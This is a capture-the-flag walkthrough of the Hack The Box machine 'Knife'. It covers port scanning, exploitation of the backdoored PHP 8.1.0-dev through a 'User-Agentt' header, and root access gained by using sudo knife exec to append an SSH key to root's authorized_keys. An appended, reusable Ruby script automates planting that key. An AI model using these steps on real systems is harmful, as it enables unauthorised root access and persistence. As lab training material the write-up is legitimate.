This post documents the complete walkthrough of Knife, a retired vulnerable VM created by MrKN16H, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

Background

Knife is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports on the host.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.242 --rate=500
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-05-24 00:49:40 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.242
Discovered open port 22/tcp on 10.10.10.242

Nothing unusual stood out. Let’s go one better with nmap on the discovered ports to establish their services and versions.

nmap -n -v -Pn -p22,80 -A --reason 10.10.10.242 -oN nmap.txt
...
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea

Hmm. I guess the path to a foothold is through the HTTP service. This is what it looks like.

This is a shit-show, man. There is nothing: no hyperlinks, no forms, no nothing.

PHP 8.1.0-dev Backdoor Remote Command Execution

It was only when I noticed the PHP version in use (PHP advertises it in the X-Powered-By response header when expose_php is on) that I realized I was looking at a PHP backdoor.

According to this repo,

An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.

Bingo!

Foothold

Armed with this insight, it’s not very difficult to get a proper shell: whatever PHP is placed after the prefix in the User-Agentt header runs as the web server user, so a reverse shell one-liner does the job.

The file user.txt is in james’ home directory.

Privilege Escalation

During enumeration of james’ account, I noticed that james is able to run knife as root via sudo.

GTFOBins - knife exec

Check this out.

Use the knife exec subcommand to execute Ruby scripts in the context of a fully configured Chef Infra Client. Use this subcommand to run scripts that will only access Chef Infra Server one time (or otherwise very infrequently) or any time that an operation does not warrant full usage of the knife subcommand library.

I’d simply append an SSH public key I control to /root/.ssh/authorized_keys and call it a day. Note the mode: "a" in File.write: it appends, so any key root already has stays in place rather than being clobbered.

sudo knife exec -E 'File.write("/root/.ssh/authorized_keys", "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPEyLBRKTB13FoHcIAf4DKPh9aE8NOsYN+WTXcIreESy\n", mode: "a")'
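As an added example that is not from the post, here is the same trick as a standalone Ruby script for knife exec. It handles the case the one-liner does not: /root/.ssh not existing yet, and the permissions sshd insists on under StrictModes (0700 on the directory, 0600 on the file). The install_key helper, the /tmp/addkey.rb path and the SUDO_USER guard are mine; the public key is the one from the one-liner above and should be replaced with your own.

```ruby
#!/usr/bin/env ruby
# Run as: sudo knife exec /tmp/addkey.rb
# knife exec evaluates this file as Ruby inside the Chef client, so with
# sudo it runs as root (added example, not the original post's code).
require 'fileutils'

# The key from the write-up; replace with a public key you hold the private half of.
PUBKEY = 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPEyLBRKTB13FoHcIAf4DKPh9aE8NOsYN+WTXcIreESy'

# Append an SSH public key to <home>/.ssh/authorized_keys, creating the
# directory if needed and leaving permissions sshd will accept. Idempotent:
# a key that is already present is not added twice. Returns the resulting
# list of keys so the caller can confirm the write.
def install_key(pubkey, home: '/root')
  ssh_dir = File.join(home, '.ssh')
  auth    = File.join(ssh_dir, 'authorized_keys')

  FileUtils.mkdir_p(ssh_dir, mode: 0o700)

  existing = File.exist?(auth) ? File.readlines(auth, chomp: true) : []
  unless existing.include?(pubkey)
    # 'a' appends, so root's own keys (if any) survive.
    File.open(auth, 'a', 0o600) { |f| f.puts(pubkey) }
  end
  File.chmod(0o600, auth)   # enforce even if the file pre-existed with looser bits

  File.readlines(auth, chomp: true)
end

# Only act when actually launched through sudo (sudo always exports
# SUDO_USER to the child). Loading the file any other way just defines
# install_key, which keeps a dry run from touching /root.
if ENV.key?('SUDO_USER')
  puts install_key(PUBKEY)
end
```

After `sudo knife exec /tmp/addkey.rb` prints the key list, `ssh -i <private key> root@10.10.10.242` should log you straight in; if it does not, check that /root itself is not group- or world-writable, which StrictModes also rejects.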

:dancer: